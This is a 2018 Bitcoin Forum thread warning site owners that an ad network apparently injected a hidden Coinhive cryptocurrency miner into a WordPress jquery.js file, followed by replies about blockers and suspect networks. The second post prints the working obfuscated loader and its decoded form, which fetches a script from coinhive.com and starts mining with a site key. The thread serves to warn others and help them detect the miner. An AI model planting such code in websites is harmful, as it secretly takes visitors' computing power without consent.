Bitcoin Forum
November 15, 2024, 11:02:04 PM *
News: Latest Bitcoin Core release: 28.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1]
  Print  
Author Topic: Warning: potential malicious code originating from advertising network  (Read 153 times)
n3wspartan (OP)
Newbie
*
Offline Offline

Activity: 10
Merit: 3


View Profile
January 18, 2018, 10:01:53 PM
Merited by Lucius (3)
 #1

I'd encourage anybody who's using crypto add networks to check your websites for potential malicious code.

Install an extension such as Minerblock and load your website.

I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.

Please report your findings here. I won't disclose the network until we have more evidence.
n3wspartan (OP)
Newbie
*
Offline Offline

Activity: 10
Merit: 3


View Profile
January 18, 2018, 10:12:20 PM
 #2

Here's the relevant code if anyone is interested:

Code:
var _0x7a2c = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x6F\x6E\x6C\x6F\x61\x64", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x65\x61\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x63\x6F\x6D\x2F\x6C\x69\x62\x2F\x63\x6F\x69\x6E\x68\x69\x76\x65\x2E\x6D\x69\x6E\x2E\x6A\x73", "\x4B\x34\x4B\x35\x5A\x78\x63\x54\x33\x42\x6A\x62\x78\x44\x43\x42\x42\x56\x6A\x39\x37\x32\x47\x62\x51\x57\x76\x32\x6B\x55\x4E\x55", "\x73\x74\x61\x72\x74"];

    function loadScript(_0xca68x2, _0xca68x3) {
        var _0xca68x4 = document[_0x7a2c[1]](_0x7a2c[0]);
        _0xca68x4[_0x7a2c[2]] = _0x7a2c[3];
        _0xca68x4[_0x7a2c[4]] = _0xca68x2;
        _0xca68x4[_0x7a2c[5]] = _0xca68x3;
        _0xca68x4[_0x7a2c[6]] = _0xca68x3;
        document[_0x7a2c[8]][_0x7a2c[7]](_0xca68x4)
    }
    loadScript(_0x7a2c[9], function() {
        var _0xca68x5 = new CoinHive.Anonymous(_0x7a2c[10], {
            threads: 4
        });
        _0xca68x5[_0x7a2c[11]]()
    });

If you decode var _0x7a2c using a service like http://ddecode.com/hexdecoder/, you'll get this:

Code:
var _0x7a2c = ["script", "createElement", "type", "text/javascript", "src", "onreadystatechange", "onload", "appendChild", "head", "https://coinhive.com/lib/coinhive.min.js", "K4K5ZxcT3BjbxDCBBVj972GbQWv2kUNU", "start"];
Anti-Cen
Member
**
Offline Offline

Activity: 210
Merit: 26

High fees = low BTC price


View Profile
January 18, 2018, 11:24:42 PM
 #3

Thanks for the warning

When its not Microsoft leaving back doors open it's google and the both share the same
paymasters who's name we dare not mention 

Mining is CPU-wars and Intel, AMD like it nearly as much as big oil likes miners wasting electricity. Is this what mankind has come too.
diwataluna
Full Member
***
Offline Offline

Activity: 224
Merit: 103


0x864E3764278C5EB211bF463034e703affEa15e4F


View Profile
January 19, 2018, 08:59:32 AM
 #4

I hope more evidence will be posted so more people will be aware especially as we visit sites daily related to crypto. I have Adblock on my browser but even then have not been aware of surreptitious coinhive injections in sites I visit. Thanks for the heads-up.
CryptoWave
Member
**
Offline Offline

Activity: 109
Merit: 100


Web Developer


View Profile
January 19, 2018, 09:26:23 AM
 #5

Thanks for the warning

When its not Microsoft leaving back doors open it's google and the both share the same
paymasters who's name we dare not mention  

This is likely not google, probably smaller crypto-based networks (Coinzilla, a-ads etc;)

Would be great if OP could clarify which network the ad was being served from so people can blacklist them.

Lucius
Legendary
*
Offline Offline

Activity: 3430
Merit: 6152


Crypto Swap Exchange🈺


View Profile WWW
January 19, 2018, 10:23:30 AM
 #6

I'd encourage anybody who's using crypto add networks to check your websites for potential malicious code.

Install an extension such as Minerblock and load your website.

I don't have any external scripts running apart from the one used by a well-known ad network, yet I was infected with a sneaky coinhive injection on this file: 'wp-includes/js/jquery/jquery.js'.

Please report your findings here. I won't disclose the network until we have more evidence.

There is a lot of mining scripts hidden in adds,I notice that because my antivirus/firewall is block all of them and give me notice every time.I also ask some of faucet owners about mining on their sites but some of them say they never enable such things,so it is obvious that it is hidden in adds.

I do not know is it possible to remove that code without removing adds,but it is not nice to use someone's CPU in this way.It seems that the earnings from crypto related add networks going down and they looking for a way to get some extra profit.

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
diwataluna
Full Member
***
Offline Offline

Activity: 224
Merit: 103


0x864E3764278C5EB211bF463034e703affEa15e4F


View Profile
January 30, 2018, 06:39:31 AM
 #7

By any chance, were you referring to what is reported here: https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/

I was not able to compare the scripts used yet.
bitcoinstud
Newbie
*
Offline Offline

Activity: 3
Merit: 0


View Profile
January 30, 2018, 10:18:08 AM
 #8

NoScript is quite good for protecting your browser, i run it alongside Adblock Plus...this is true though,ive seen ad content which will download and execute trojans also.
Pages: [1]
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!